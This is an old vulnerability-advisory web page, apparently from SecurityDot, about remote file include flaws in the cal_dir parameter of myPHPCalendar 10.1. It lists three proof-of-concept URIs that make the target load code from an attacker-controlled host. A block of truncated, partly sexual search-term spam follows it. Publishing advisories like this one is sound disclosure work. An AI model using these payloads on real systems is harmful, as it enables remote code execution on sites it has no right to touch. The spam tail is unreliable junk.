about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , MYPHPCalendar Cal_Dir Parameter Multiple Remote File Include Vulnerabilities


Title MYPHPCalendar Cal_Dir Parameter Multiple Remote File Include Vulnerabilities
Published 2006-12-27-12:00AM
Updated 2007-01-04-06:26PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Crazy_king is credited with the discovery of these vulnerabilities.
Vulnerable  myPHPCalendar myPHPCalendar 10.1
Not Vulnerable  
Code   An attacker can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/admin.php?cal_dir=http://[attacker]/
http://www.example.com/contacts.php?cal_dir=http://[attacker]/
http://www.example.com/convert-date.php?cal_dir=http://[attacker]/
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 19:11:22 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
indian bit phpbb 2.0. Los inquie www.sixi.c wwwsaxy.co smashingam piss clips amishapate WWW.SANIA asasasas www.trisha wwwsaxy.co Www.sxecom all+cartoo news for C Sexmovie.c badjojo,co ip board 2 fuckinpuss Vulnerabil hotsportzo WWW,89COM www.ok02.c news for c null sessi Expioits Wwwsexcom maxcpm.inf 200+%252Fc php-nuke+2 KAMASUTRA Aplikasi f www.cx5158 Big boob openSSH 3. ms06-046 www.swzxw. index2.php Sexyvidos ww1.23tmc. Aftab 200+%252Fc php-nuke+2 Sexyvidos entropysea free movie www.89sexm GET /galle Free india CMS is Fre